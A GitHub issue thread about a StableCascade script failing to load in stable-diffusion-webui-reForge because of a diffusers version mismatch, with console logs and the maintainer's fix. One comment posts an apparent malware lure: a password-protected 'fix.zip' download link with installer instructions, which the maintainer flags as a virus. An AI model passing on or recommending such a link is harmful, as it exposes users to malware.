### ISSUE TITLE
[Bug]: Error in StableCascade loading due to improper diffusers version

### ISSUE THREAD

**Issue by nveaa1** [Panchovix/stable-diffusion-webui-reForge#132]
### Checklist

- [X] The issue exists after disabling all extensions
- [X] The issue exists on a clean installation of webui
- [ ] The issue is caused by an extension, but I believe it is caused by a bug in the webui
- [X] The issue exists in the current version of the webui
- [X] The issue has not been reported before recently
- [ ] The issue has been reported before but has not been fixed yet

### What happened?

The file "stablecascade_diffusers.py" seems to require a minimum diffusers version of 0.28.1, but the current installation uses 0.28.0 and the file fails to load. If I manually change the version of diffusers in requirement_versions.txt to 0.28.1 and recreate the venv, the 0.28.1 version of diffusers installs and stablecascade_diffusers.py loads without issue.

This is on the main branch using Windows 10 and Python 3.10.11.

### Steps to reproduce the problem

1. Clone main branch
2. Create Python 3.10 venv
3. Run webui-user.bat

### What should have happened?

There should not be an error in loading stablecascade_diffusers.py. Indeed, changing the version of diffusers in requirement_versions.txt to 0.28.1 before creating the venv seems to fix the issue.

### What browsers do you use to access the UI ?

Mozilla Firefox

### Sysinfo

[sysinfo-2024-08-26-15-09.json](https://github.com/user-attachments/files/16750452/sysinfo-2024-08-26-15-09.json)

### Console logs

```Shell
venv "G:\ai_stuff\stable-diffusion-webui-reForge\venv\Scripts\Python.exe"
Python 3.10.11 (tags/v3.10.11:7d4cc5a, Apr  5 2023, 00:38:17) [MSC v.1929 64 bit (AMD64)]
Version: f1.0.2-v1.10.1RC-latest-690-g6756ebd1
Commit hash: 6756ebd11eab05a9ebf1655a29a2aa9c0520c10b
Installing requirements
Launching Web UI with arguments:
Total VRAM 12282 MB, total RAM 65447 MB
Set vram state to: NORMAL_VRAM
Device: cuda:0 NVIDIA GeForce RTX 4070 SUPER : native
Hint: your device supports --pin-shared-memory for potential speed improvements.
Hint: your device supports --cuda-malloc for potential speed improvements.
Hint: your device supports --cuda-stream for potential speed improvements.
VAE dtype: torch.bfloat16
CUDA Stream Activated:  False
G:\ai_stuff\stable-diffusion-webui-reForge\venv\lib\site-packages\transformers\utils\hub.py:127: FutureWarning: Using `TRANSFORMERS_CACHE` is deprecated and will be removed in v5 of Transformers. Use `HF_HOME` instead.
  warnings.warn(
Using pytorch cross attention
*** Error loading script: stablecascade_diffusers.py
    Traceback (most recent call last):
      File "G:\ai_stuff\stable-diffusion-webui-reForge\modules\scripts.py", line 524, in load_scripts
        script_module = script_loading.load_module(scriptfile.path)
      File "G:\ai_stuff\stable-diffusion-webui-reForge\modules\script_loading.py", line 13, in load_module
        module_spec.loader.exec_module(module)
      File "<frozen importlib._bootstrap_external>", line 883, in exec_module
      File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
      File "G:\ai_stuff\stable-diffusion-webui-reForge\extensions-builtin\StableCascade-for-webUI-main\scripts\stablecascade_diffusers.py", line 2, in <module>
        check_min_version("0.28.1")
      File "G:\ai_stuff\stable-diffusion-webui-reForge\venv\lib\site-packages\diffusers\utils\__init__.py", line 131, in check_min_version
        raise ImportError(error_message)
    ImportError: This example requires a minimum version of 0.28.1, but the version found is 0.28.0.


---
ControlNet preprocessor location: G:\ai_stuff\stable-diffusion-webui-reForge\models\ControlNetPreprocessor
Loading model realisticVisionV51_v51VAE.safetensors [15012c538f] (1 of 1)
Loading weights [15012c538f] from G:\ai_stuff\stable-diffusion-webui-reForge\models\Stable-diffusion\realisticVisionV51_v51VAE.safetensors
2024-08-26 11:05:48,650 - ControlNet - INFO - ControlNet UI callback registered.
Running on local URL:  http://127.0.0.1:7860
model_type EPS
UNet ADM Dimension 0

To create a public link, set `share=True` in `launch()`.
Startup time: 12.0s (prepare environment: 4.4s, import torch: 3.0s, import gradio: 0.6s, setup paths: 0.9s, initialize shared: 0.1s, other imports: 0.4s, load scripts: 1.5s, create ui: 0.4s, gradio launch: 0.5s).
Using pytorch attention in VAE
Working with z of shape (1, 4, 32, 32) = 4096 dimensions.
Using pytorch attention in VAE
G:\ai_stuff\stable-diffusion-webui-reForge\venv\lib\site-packages\transformers\tokenization_utils_base.py:1601: FutureWarning: `clean_up_tokenization_spaces` was not set. It will be set to `True` by default. This behavior will be depracted in transformers v4.45, and will be then set to `False` by default. For more details check this issue: https://github.com/huggingface/transformers/issues/31884
  warnings.warn(
extra {'cond_stage_model.clip_l.logit_scale', 'cond_stage_model.clip_l.text_projection'}
left over keys: dict_keys(['cond_stage_model.clip_l.transformer.text_model.embeddings.position_ids'])
To load target model SD1ClipModel
Begin to load 1 model
[Memory Management] Current Free GPU Memory (MB) =  11052.9990234375
[Memory Management] Model Memory (MB) =  454.20703506469727
[Memory Management] Minimal Inference Memory (MB) =  1024.0
[Memory Management] Estimated Remaining GPU Memory (MB) =  9574.791988372803
Moving model(s) has taken 0.20 seconds
Model realisticVisionV51_v51VAE.safetensors [15012c538f] loaded in 2.5s (load weights from disk: 0.6s, forge load real models: 1.5s, calculate empty prompt: 0.4s).
```

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Panchovix** [comment]
Don't download links from some users! They are viruses!

Related to your issue, I have done an update that fixes this, thanks!

**Comment by nveaa1** [comment]
Thanks! I've additionally reported the would-be malware poster above.
